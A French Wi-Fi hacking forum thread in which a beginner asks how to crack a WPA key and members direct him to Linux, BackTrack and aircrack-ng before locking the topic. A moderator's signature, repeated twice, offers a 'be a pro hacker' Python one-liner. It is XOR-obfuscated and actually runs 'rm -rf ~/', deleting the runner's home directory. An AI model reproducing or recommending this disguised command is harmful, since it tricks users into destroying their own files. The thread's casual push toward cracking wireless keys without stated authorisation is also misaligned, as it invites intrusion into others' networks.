Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-06-2011 08:59:43

Max747
Membre

Par ou commencer?

Bonjour,
Etant débutant, je ne sais pas qu'elle est la meilleure solution pour cracquer une clé WAP.
Je dispose d'une clé Alfa AWUSO36H avec chipset RTL8187B.
D'une livebox mini 1235 dont la clé est 97DF E3DE 6F6E C71A 3A53 A3E1 E5
Quelqu' un ayant réussi à cracquer une clé avec le même métériel pourrait il me guider afin d'en faire autant?
Merci.
smile

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-06-2011 15:55:08

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Re : Par ou commencer?

Ton matos est nickel pour les tests.

Ben je dirais commence par le début, il y a des tutos plein le site et plein le net à ce sujet.

Installe Gnu/Linux en dur ou sur une clé Usb bootable, lance une console, jette toi à l'eau et quand tu butte sur une étape, reviens vers nous pour poser une question précise.

Nous n'allons certainement pas te mâcher le travail, du début à la fin, l'apprentissage commence déjà par une implication personnelle.
En revanche tu trouveras du monde pour t'aider si tu arrives en ayant déjà un peu testé et ou essayé de ton côté.

Bon courage et au boulot !!!!

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#3 08-06-2011 16:00:04

Max747
Membre

Gnu/linux est le logiciel que tu as utilisé?
Il se trouve à quel endroit?

#4 08-06-2011 16:06:03

Max747
Membre

Pourquoi ne pas prendre une version de backtrack 2 ou3 ou 4 se trouvant sur ce site ?

#5 08-06-2011 16:08:53

noireaude
Membre d'honneur
Site Web

Ne le prend pas mal ce n'est pas le but, mais tu sembles partir de très loin dans ce domaine.
Donc si je peux te donner un conseil avant de commencer quoi que ce soit, documentes toi un maximum avant de commencer.

Gnu/linux est un gros logiciel oui smile. Ou plutôt si tu préfères un système d'exploitation (Comme Windows mais en mieux).

Il te permettra d'exploiter au mieux les logiciels dédiés au crack WEP/WPA comme aircrack-ng

GNU/linux.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 08-06-2011 16:15:06

Max747
Membre

Non je ne le prends pas mal.
Je connais linux et ces complexités me décourage pour ces réglages manuels.
Je me suis déjà documenté car ce n' est pas pour rien si je me suis procurer la clé Alfa.
Je voudrai savoir quelle version de Backtrack je peux utiliser?
Ou si tu as déjà utilisé Backtrack et si oui quelle version?
Les tutos je les ai repérés et commencer à les étudier.
Voilà merci.

#7 08-06-2011 16:23:43

noireaude
Membre d'honneur
Site Web

Je pense que tu devrais dans un premier temps utiliser Backtrack 4r2.
Si les difficultés te découragent tu peux commencer dans ce cas avec une Ubuntu (LTS 10.4) plus accessible.
Et installer aircrack-ng dessus pour te faire la main doucement.

Pour l'installation d'aircrack-ng dessus rien de plus simple, tu ouvres une console dessus et tu entres dedans un "sudo apt-get install aircrack-ng".

#8 08-06-2011 16:46:24

Max747
Membre

Merci déjà pour tous ces renseignements.
Mais j' espérais faire exactement comme toi ou quelqu' un d'autre.
Une sorte de copier/coller si tu préfères.Car moins difficile à mettre en oeuvre et pouvant servir à d'autres par la même occasion.
Je vais donc m' orienter vers Backtrack 4 r2 en espérant ne pas trop rencontrer de difficultés comme tu semble me l' indiquer.
J'aurai peut être aimer connaître la version de Backtrack la plus facile à utiliser?
Quand à Ubuntu (LTS 10.4) et l' installation d'aircarck-ng, je ne comprends pas ce que tu précises par entrer dedans un "sudo apt-get install aircrack-ng".Je suppose que cela doit être simple.Mais faut il encore savoir exactement la procédure.
Je reviendrai probablement sur ce sujet lorsque j'aurai commencer avec Backtrack 4.
A+

#9 08-06-2011 16:55:35

noireaude
Membre d'honneur
Site Web

Max747 a écrit :

Quand à Ubuntu (LTS 10.4) et l' installation d'aircarck-ng, je ne comprends pas ce que tu précises par entrer dedans un "sudo apt-get install aircrack-ng".Je suppose que cela doit être simple.Mais faut il encore savoir exactement la procédure.
Je reviendrai probablement sur ce sujet lorsque j'aurai commencer avec Backtrack 4.
A+

J'entendais par la d'ouvrir une console ou un terminal si tu préfères et d'entrer dedans la ligne de commande que je t'ai indiqué ce qui va avoir pour effet de lancer l'installation d'Aircrack-ng.

sudo                         Te permet d'exécuter la commande en administrateur (sur Ubuntu).
apt-get                     Est grosso modo le gestionnaire de paquet utilisé sous Ubuntu entre autre.
install aircrack-ng      Lui donne le nom du paquet que tu souhaites installer.

Tu peux utiliser Backtrack si tu le souhaites mais quand je vois que tu ne comprends pas une commande de base (du moins le principe) je préfère te dire d'abandonner pour le moment et te lancer dans un premier temps das l'apprentissage de Gnu/linux.

Cela ne va te servir à rien de balancer du copier /coller à tout va si tu ne comprends rie à ce que tu fais.
Tu n'apprendras rien de cette manière et je ne pense pas qu'ici quelqu'un vienne te mâcher le travail à ce point.
Commence par te renseigner sur ce qu'est GNU/linux, sur les différentes distributions, sur ce qu'est une console et sur l'utilisation de celle-ci.

Si tu brûles cette étape, c'est même pas la peine de démarrer sur Backtrack.

#10 08-06-2011 21:30:25

spawn
Modérateur

C'est BEAU un noob.
(sans vouloir te vexer ^^)

Liste des épreuves pour te la péter devant tes copains :
- booter sur BT
- ouvrir un terminal
- utiliser la suite airckrack-ng*

*Attention ! il y a plusieurs outils dans la suite aircrack-ng et pas seulement le programme aircrack-ng.
(airolib-ng, airodump-ng, aireplay-ng, airbase-ng,, airpoké-ng, airmon-ng)

Courage !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#11 09-06-2011 07:52:06

Max747
Membre

Je ne suis pas vexé car je suis conscient que tous ont été noobs au commencement!
Par contre je ne suis pas plus bête qu' un autre mais resterai dans l' ignorance ou tout au moins dans l' échecs de mon projet si une main ne se tends pas vers moi pour m'aider.(Comme je suis convaincu que cela fût le cas pour beaucoup d'entre vous à en lire les messages).
Donc je vais booter sur BT et voir la suite.
Mais il ne me semble pas que les logiciels airolib-ng, airodump-ng, aireplay-ng, airbase-ng,, airpoké-ng, airmon-ng soient tous obligatoires pour trouver une clé WAP.
N'est ce pas?
Quelqu' un peut il me confirmer quels sont les logiciels qu'il a utiliser pour parvenir à ces fins?
Si il s'en souvient?
Merci.

#12 09-06-2011 08:39:33

noireaude
Membre d'honneur
Site Web

Max747 a écrit :

Par contre je ne suis pas plus bête qu' un autre mais resterai dans l' ignorance ou tout au moins dans l' échecs de mon projet si une main ne se tends pas vers moi pour m'aider.(Comme je suis convaincu que cela fût le cas pour beaucoup d'entre vous à en lire les messages).

Bon !!! La ca m'énèrve !!!! [mode fâché tout rouge]
C'est le genre de phrase "chien battu, suis seul au monde et très malheureux, syndrôme Cosette" qui a le don de me gonfler.

Si tu n'es pas plus bête qu'un autre alors s'il te plaît ne prends pas les gens pour des andouilles non plus.
A croire que tu ne veux pas simplement un coup de main.
Tu tournes autour du po(s)t sans vraiment rien entreprendre de concret.
Comme si tu voulais simplement qu'on te mâche le travail de A à Z en te prenant par la main pour qu'éventuellement tu n'ai que du copier coller à faire. (Mauvaise idée)

Les réponses à ton topic [par ou commencer] te donnent largement de quoi entamer tes recherches.
[par ou commencer] ne veut pas dire que je sache assistez moi du début à la fin.

Ca induit l'idée que tu cherches par ou commencer pour ensuite t'y mettre.
A ce titre j'estime que tu as eu les réponse qu'il te faut pour justement commencer.
La moindre des choses serait que tu les lises correctement, que tu te sortes les doigts du c..  pour commencer à t'en servir.

Je t'ai donné des liens, il y a des tonnes du tutos sur aircrack-ng sur la manière de cracker du WEP, du WPA, ici même et sur Google.
Il y a même des tonnes de vidéos.
Bref !! Tu as tout sous la main pour commencer ici.
Il te suffit juste de prendre le temps de lire et de chercher un peu.

Dans ta dernière réponse tu poses deux questions auquel je répond plus haut, et que Spawn réitère juste au dessus.

- booter sur BT
- ouvrir un terminal
- utiliser la suite airckrack-ng*

Faut arrêter la !!!!

Alors soit tu t'y met sérieusement et tu reviens avec des questions précises qui puissent démontrer que tu as fais l'effort de t'y mettre et que tu es motivé.
Soit tu n'as pas envie de t'investir, tu veux être pris par la main de A à Z et tu laisses tomber tout court. Car dans ce cas tu n'es pas au bon endroit.

Aider les gens quand ils sont réellement motivés c'est une chose, tomber dans l'assistanat en est une autre. (Je ne supporte pas la deuxième).

Excuse moi pour le ton un peu brusque, il n'a pas pour but de te dévaloriser ou de te manquer de respect. Loin de la.
Je veux juste que les choses soient claires et que tu comprennes que si tu ne te bouges pas un minimum.
Personne ne le fera pour toi !!!

#13 09-06-2011 11:25:24

Max747
Membre

Ho du calme.Pas d' énervements.
Cela ne fait même pas 24 heures que j' ai poster ce sujet que tu voudrais déjà que je fonce tête baissée alors qu' il y a tant de différents logiciels qui me laisse l'embara du choix.Et beaucoup de tutos à examiner pour découvrir la meilleure façon de procéder.
Il était pourtant simple de m' indiquer " j'ai utiliser tels et tels logiciels comme me l' a indiqué Spawn" que je remercie au passage.
Ca topic aurait aussi le mérite d'éclairer d'autres personnes qui ne connaissent pas grand chose non plus et qui ne savent pas par ou commencer.
Déjà mon message indique que la clé Alfa est la bonne solution entre autre avec les logiciels Backtrack (BT).
A+

#14 09-06-2011 17:41:13

noireaude
Membre d'honneur
Site Web

Max747 a écrit :

Il était pourtant simple de m' indiquer " j'ai utiliser tels et tels logiciels comme me l' a indiqué Spawn" que je remercie au passage.

Justement ça a été fait dès le début on a cité Gnu/linux (Ubuntu ou Backtrack), un terminal et la suite Aircrack-ng.

Tu n'as besoin de rien de plus, si ce n'est de t'informer sur tout cela, de tester et de revenir avec des question relatives aux difficultés que tu rencontre à telle ou telle étape.

Et tu reviens 8 messages plus loin avec,

Quelqu' un peut il me confirmer quels sont les logiciels qu'il a utiliser pour parvenir à ces fins?
Si il s'en souvient?
Merci.

Tu peux comprendre que cela mette en rogne non ?

J'aurais mieux compris que tu reviennes avec un, voila j'ai booté sur Bactrack, lancé aircrack, ou comment utiliser un dico etc etc ... berf un truc qui laisse supposer que tu as déjà fourni un travail de recherches personnelles suite aux infos qu'on ta donné.

Ce qu'apparemment tu n'as pas fait.

#15 10-06-2011 08:38:50

spawn
Modérateur

pour booter sous BT5, le login c'est "root"
et le mot de passe "toor"
il faut taper "startx" ensuite pour charger l'interface graphique.

Maintenant, je me tais. J'en ai déja trop dit !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#16 10-06-2011 08:59:30

Max747
Membre

BT5 serait mieux que les autres en étant la dernière version?
Peux tu m' indiquer ou le télécharger?
Je ne comprends pas pourquoi tu m' écris en avoir trop dit?
Merci quand même.
Rassurez vous j' aurai probablement bientôt d'autres questions faisant suite à l' installation de Backtrak!
A+

#17 10-06-2011 09:23:17

antares145
Membre d'honneur
Site Web

BT5 serait mieux que les autres en étant la dernière version?
Peux tu m' indiquer ou le télécharger?

Max747, tu vas finir par énerver définitivement l'ami Noireaude si tu continues à poser des questions
1) Auxquelles il a déjà répondu

noireaude a écrit :

Je pense que tu devrais dans un premier temps utiliser Backtrack 4r2.

2) Auxquelles tu peux trouver la réponse en 4 secondes sur Google (tu vas sur le site officiel et tu récupères l'ISO dans la section "Downloads")

Comme Noireaude je n'ai rien contre les questions de base, à condition que tu fasses un effort de recherche d'abord. Et là, j'ai pas l'impression que tu as fait l'effort en question... Il y a des tonnes de tutos sur le net, en français ou en anglais, voire même en vidéo, cherche de ton côté et reviens poser des questions plus précises ici après wink

Rassurez vous j' aurai probablement bientôt d'autres questions faisant suite à l' installation de Backtrak!

Chui pas sûr que ça me rassure ça pour le coup big_smile

#18 10-06-2011 09:41:37

Max747
Membre

J' ennerve !!!!!!
Alors si je ne peux plus poser de question sans énerver c' est un comble!
Car après tout je ne fais que répondre à spawn quand il me propose d'installer BT5 en lui demandant si il est préférable pour moi d'installer cette version.
Maintenant si personne n' a sous le coude une adresse internet pour télécharger celui ci, la moindre des choses est de me l' écrire sans m' attaquer en me faisant passer pour quelqu' un qui ne veut pas chercher sur Google!
Cela fait 14 ans que je suis sur internet et bien avant Google que j' ai vu naître!
Personnellement si quelqu' un me demandait une adresse j' essaierai de lui donner si j' en aurai le temps de la retrouver.
Maintenant je vais voir de mon côter pour télécharger tout cela sans plus rien demander puisque ça énerve.

#19 10-06-2011 09:50:30

antares145
Membre d'honneur
Site Web

C'est bien ce que je craignais, ce topic était voué à partir en vrille roll

"L'adresse internet pour télécharger BackTrack" tu peux la trouver sur Google en 4 secondes, c'est-à-dire le 10ème du temps que tu mets pour rédiger ce genre de message. Noireaude te l'a déjà dit et je te le redis : on est prêt à t'aider si tu fais un effort minimum, ce qui n'est pas le cas ici. Si tu cherches une assistance pas à pas "télécharge ceci, puis clique là et là", t'es mal tombé. Si tu posais des questions du genre "quelle version de BackTrack 5 vaut-il mieux que je télécharge ?" tu aurais eu une réponse, mais là...

Oui, tu finis par énerver quand tu reposes des questions auxquelles on t'a déjà répondu dans ce même topic, sans faire aucune recherche entre-temps. Si ça te vexe, tant pis pour toi.

Maintenant, puisque tu es décidé à "télécharger sans plus rien demander" (c'est ton choix), je verrouille ce topic dont il ne sortira quand même plus rien de bon.

Bonne recherche wink

Annonce